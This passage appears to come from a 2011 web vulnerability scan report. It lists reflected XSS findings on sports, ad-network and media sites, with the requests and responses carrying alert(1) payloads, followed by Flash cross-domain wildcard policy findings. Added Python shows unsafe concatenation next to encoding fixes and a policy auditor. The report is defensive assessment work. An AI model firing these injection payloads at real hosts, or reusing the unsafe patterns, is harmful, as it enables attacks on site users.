Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:04 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/98741344c242"><script>alert(1)</script>4a7447b872b','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.101. http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 827d3"><script>alert(1)</script>ef15667ce85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9874134?827d3"><script>alert(1)</script>ef15667ce85=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:00 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9874134?827d3"><script>alert(1)</script>ef15667ce85=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.102. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf530"-alert(1)-"8e103b168e9 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/4462/5032/7102-15.js?cb=0.3047261026222259 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=cf530"-alert(1)-"8e103b168e9; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:11 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:54:11 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 01:54:11 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^49&9346^125a76039212413077175f84d; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111948; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1308

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188089"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=cf530"-alert(1)-"8e103b168e9\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

5.103. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cf42"><script>alert(1)</script>c5205d82800 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=1cf42"><script>alert(1)</script>c5205d82800; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:34 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:34 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:55:34 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^42&9346^125a7603945366735abcf916; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111865; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1413

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=1cf42"><script>alert(1)</script>c5205d82800" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

5.104. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The value of the vaguid cookie is copied into the response body. Note that this response is served as text/javascript and the value lands inside the single-quoted second argument of GravityInsights.cc(), not between HTML tags as the scanner's classification suggests. The payload 5ec60<script>alert(1)</script>be5955fe51a was submitted in the vaguid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept shows that the cookie value is reflected without any encoding. In a JavaScript string context, however, the <script> tag in the payload is only character data; running code here would require terminating the single-quoted string, which this payload does not attempt, so the reflection should be re-tested with a single quote before it is treated as exploitable.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note also that the response re-issues the cookie (Set-Cookie: vaguid=... carrying the injected value, with an expiry in 2063), so any value an attacker does manage to plant persists across later visits to .gravity.com.

Request

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398395ec60<script>alert(1)</script>be5955fe51a

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0 JSP/2.2 (Oracle GlassFish Server 3.1 Java/Sun Microsystems Inc./1.6)
Server: Oracle GlassFish Server 3.1
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 111
Date: Sun, 04 Sep 2011 01:01:01 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398395ec60<script>alert(1)</script>be5955fe51a; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:02 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b398395ec60<script>alert(1)</script>be5955fe51a');

5.105. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie is copied into a JSONP response body that the server labels Content-Type: text/html. The payload c7a2a<script>alert(1)</script>9489ac10615 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

Because the response is typed as HTML, a browser that loads it directly renders the <script> element in the payload as markup, so the proof of concept does demonstrate script execution in that case. When the same response is consumed as a script through the callback parameter, the value sits inside a double-quoted JavaScript string instead, and a double quote rather than a tag would be the breakout character.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Two further points a reviewer would want: the endpoint hands the session identifier to the calling page inside the JSONP callback, and the response re-sets JSESSIONID with the injected value (Set-Cookie: JSESSIONID=...; Path=/), so a planted value is written back rather than discarded.
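Items 5.97 through 5.105 all report the same root cause, raw concatenation of request data into a response, but in three different output contexts: a URL path inside a double-quoted href that holds a javascript: URL (5.97-5.101), a cookie value inside a double-quoted JavaScript string that carries HTML (5.102, and the single-quoted variant in 5.104), and a cookie value inside a JSONP body served as text/html (5.105). The following Python is an added example written for this report, not code from Burp Suite or from any of the sites named. The *_unsafe functions reproduce the concatenation pattern visible in the responses; the *_safe functions are hypothetical fixes that encode for each context; the payload strings are copied from the requests above, and the scanner's own success test ("echoed unmodified") is reimplemented as echoed_unmodified().

```python
"""Context-aware output encoding for the reflection contexts in 5.97-5.105.

The *_unsafe functions reproduce the concatenation visible in the responses;
the *_safe functions are hypothetical fixes written for this report, not code
from und.com, rubiconproject.com, gravity.com or nbcuni.com."""
import html
import json
import re
from urllib.parse import quote

# Payloads copied from the requests in this section.
ATTR_PAYLOAD = '99ae9"><script>alert(1)</script>fcb6a136b80'   # 5.97
JS_PAYLOAD = 'cf530"-alert(1)-"8e103b168e9'                     # 5.102
TEXT_PAYLOAD = 'c7a2a<script>alert(1)</script>9489ac10615'      # 5.105

PRINT_BASE = 'http://www.cstv.com/printable/schools/nd'
PIXEL_BASE = 'http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu='


def echoed_unmodified(response_body: str, payload: str) -> bool:
    """The scanner's own success test: payload present byte-for-byte."""
    return payload in response_body


def js_literal(value) -> str:
    """JSON-encode, then escape < > & as \\uXXXX so the literal stays inert
    even if the script is ever inlined into HTML (no </script> breakout)."""
    return (json.dumps(value).replace('<', '\\u003c')
            .replace('>', '\\u003e').replace('&', '\\u0026'))


# 5.97-5.101: request path inside href="javascript:window.open('...')"
def print_link_unsafe(request_path: str) -> str:
    return ('<a href="javascript:window.open(\'' + PRINT_BASE + request_path
            + '\',\'Printable\',\'toolbar=no\'); void(\'\');" class="PrinterFriendly">')


def print_link_safe(request_path: str) -> str:
    """Treat the path as URL data (percent-encode " ' < > ( )), then encode
    the whole javascript: URL for the attribute.  Order matters: the browser
    HTML-decodes the attribute first, then the JS engine parses the string."""
    url = PRINT_BASE + quote(request_path, safe='/?=&')
    js_url = "javascript:window.open('" + url + "','Printable','toolbar=no'); void('');"
    return '<a href="' + html.escape(js_url, quote=True) + '" class="PrinterFriendly">'


# 5.102: cookie value inside a double-quoted JS string that carries HTML
def js_pixel_unsafe(ruid: str) -> str:
    return ('var pixel = "<img src=\\"' + PIXEL_BASE + ruid
            + '\\" style=\\"display: none;\\" alt=\\"\\"/>";')


def js_pixel_safe(ruid: str) -> str:
    # The cookie value is URL data inside the img src: percent-encode it first,
    # then let js_literal produce the string literal with quotes and < > escaped.
    img = '<img src="' + PIXEL_BASE + quote(ruid, safe='') + '" style="display: none;" alt=""/>'
    return 'var pixel = ' + js_literal(img) + ';'


# 5.105: cookie value inside a JSONP body served as text/html
def jsonp_unsafe(callback: str, session_id: str):
    body = callback + '({ "cookie":{"JSESSIONID":"' + session_id + '"}});'
    return 'text/html', body


def jsonp_safe(callback: str, session_id: str):
    """Serialize with js_literal and serve as JavaScript, never as HTML.  The
    callback-name check is standard JSONP hygiene (assumed here; the report
    does not test that parameter)."""
    if not re.fullmatch(r'[A-Za-z_$][\w$.]*', callback):
        raise ValueError('unexpected characters in callback name')
    body = callback + '(' + js_literal({'cookie': {'JSESSIONID': session_id}}) + ');'
    return 'application/javascript', body


def parse_jsonp(body: str, callback: str) -> dict:
    """Strip the callback wrapper and decode; the \\u003c escapes round-trip."""
    assert body.startswith(callback + '(') and body.endswith(');')
    return json.loads(body[len(callback) + 1:-2])


if __name__ == '__main__':
    path = '/sports/m-footbl/9873956?' + ATTR_PAYLOAD + '=1'
    print(print_link_unsafe(path))
    print(print_link_safe(path))
    print(js_pixel_safe(JS_PAYLOAD))
    print(jsonp_safe('__nbcsnasadops.doSCallback', 'C58B' + TEXT_PAYLOAD)[1])
```

The design point is that one encoder is not enough: the print link passes through a URL, a JavaScript string and an HTML attribute, and the fix has to encode from the innermost context outward. Percent-encoding the path removes every breakout character for the URL and JS-string layers, and html.escape() then protects the attribute. For the JSONP endpoint the content type is as important as the encoding; a body served as text/html is parsed as markup no matter how carefully the JSON inside it was built.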

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2c7a2a<script>alert(1)</script>9489ac10615

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2c7a2a<script>alert(1)</script>9489ac10615; Path=/
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:54:12 GMT
Content-Length: 131
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2c7a2a<script>alert(1)</script>9489ac10615"}});

6. Flash cross-domain policy
There are 65 instances of this issue:

Issue background

The Flash cross-domain policy (crossdomain.xml) controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy: a SWF served from an allowed domain can send requests to this domain with the user's cookies attached and read the responses, which the same-origin policy would otherwise prevent. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
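The review step above can be automated. The following Python is an added example written for this report, not code from Burp Suite or from any of the hosts listed; it parses a policy and flags the settings the items below show: a wildcard domain, secure="false" (which lets a SWF loaded over plain HTTP use a policy served over HTTPS), and a site-control element with permitted-cross-domain-policies="all" (which makes Flash Player honour policy files anywhere on the host, not only the master /crossdomain.xml). The first three samples are the policy bodies shown in 6.1, 6.9 and 6.10, reduced to the elements visible there; the fourth is constructed as a restrictive counter-example, and the severity labels are this example's own.

```python
"""Audit Flash cross-domain policies for over-permissive settings.

Added example for this report, not code from Burp Suite or any listed host.
Samples: policy bodies shown in 6.1, 6.9 and 6.10 (elements visible in the
report only) plus one constructed restrictive policy for contrast."""
import xml.etree.ElementTree as ET

SAMPLES = {
    'ad.afy11.net (6.1)': (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE cross-domain-policy SYSTEM '
        '"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">\n'
        '<cross-domain-policy>\n'
        '<allow-access-from domain="*" />\n'
        '</cross-domain-policy>\n'),
    'cdn.gigya.com (6.9)': (
        '<cross-domain-policy>\n'
        '<allow-access-from domain="*" to-ports="80" />\n'
        '<allow-access-from domain="*" to-ports="443" secure="false" />\n'
        '</cross-domain-policy>\n'),
    'cdn.taboolasyndication.com (6.10)': (
        '<cross-domain-policy>\n'
        '<site-control permitted-cross-domain-policies="all" />\n'
        '<allow-access-from domain="*"/>\n'
        '<allow-access-from domain="*" secure="false"/>\n'
        '<allow-access-from domain="*" to-ports="80,443"/>\n'
        '</cross-domain-policy>\n'),
    'constructed restrictive policy': (
        '<cross-domain-policy>\n'
        '<site-control permitted-cross-domain-policies="master-only" />\n'
        '<allow-access-from domain="www.example.com" secure="true" />\n'
        '</cross-domain-policy>\n'),
}


def audit_policy(xml_text: str) -> list:
    """Return human-readable findings; an empty list means nothing flagged."""
    # The stdlib expat parser records the DOCTYPE but does not fetch the DTD.
    root = ET.fromstring(xml_text)
    findings = []
    sc = root.find('site-control')
    if sc is not None and sc.get('permitted-cross-domain-policies') == 'all':
        findings.append('site-control "all": policy files anywhere on the host are honoured')
    for rule in root.findall('allow-access-from'):
        domain = rule.get('domain', '')
        ports = rule.get('to-ports')
        if domain == '*':
            findings.append('wildcard domain "*"' + (f' (to-ports={ports})' if ports else ''))
        elif domain.startswith('*.'):
            findings.append(f'wildcard subdomains {domain}')
        # secure defaults to true; "false" extends an HTTPS policy to HTTP-loaded SWFs
        if rule.get('secure', 'true').lower() == 'false':
            findings.append(f'secure="false" on domain {domain}: '
                            'SWFs loaded over plain HTTP may use this policy for HTTPS content')
    return findings


def severity(findings: list) -> str:
    """Mirror the report's rating: any wildcard domain is High (labels are this example's)."""
    if any(f.startswith('wildcard domain') for f in findings):
        return 'High'
    return 'Medium' if findings else 'OK'


def audit_all(samples: dict) -> dict:
    """Map each host label to its severity."""
    return {host: severity(audit_policy(xml)) for host, xml in samples.items()}


if __name__ == '__main__':
    for host, xml in SAMPLES.items():
        found = audit_policy(xml)
        print(f'{host}: {severity(found)}')
        for f in found:
            print('  -', f)
```

To run it against a live host, fetch /crossdomain.xml with any HTTP client and pass the body to audit_policy(); a 404 means no master policy, which is the safe default. The checker deliberately reads only the attributes shown in this section, so a policy that uses allow-http-request-headers-from or per-path policy files needs a manual look as well.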


6.1. http://ad.afy11.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:56:35 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.2. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 00:55:06 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 00:55:05 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.3. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 00:53:45 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.4. http://api.bit.ly/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bit.ly

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:49:05 GMT
Content-Type: text/xml
Content-Length: 141
Last-Modified: Wed, 25 May 2011 20:29:51 GMT
Connection: close
Expires: Tue, 06 Sep 2011 00:49:05 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://bit.ly/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.5. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:49:46 GMT
Date: Sun, 04 Sep 2011 00:49:46 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.6. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729062000"
Last-Modified: Tue, 30 Aug 2011 18:31:02 GMT
Content-Type: application/xml
Content-Length: 269
Date: Sun, 04 Sep 2011 00:56:36 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
               <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.7. http://c.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:55:17 GMT
Connection: close

<?xml version="1.0"?>
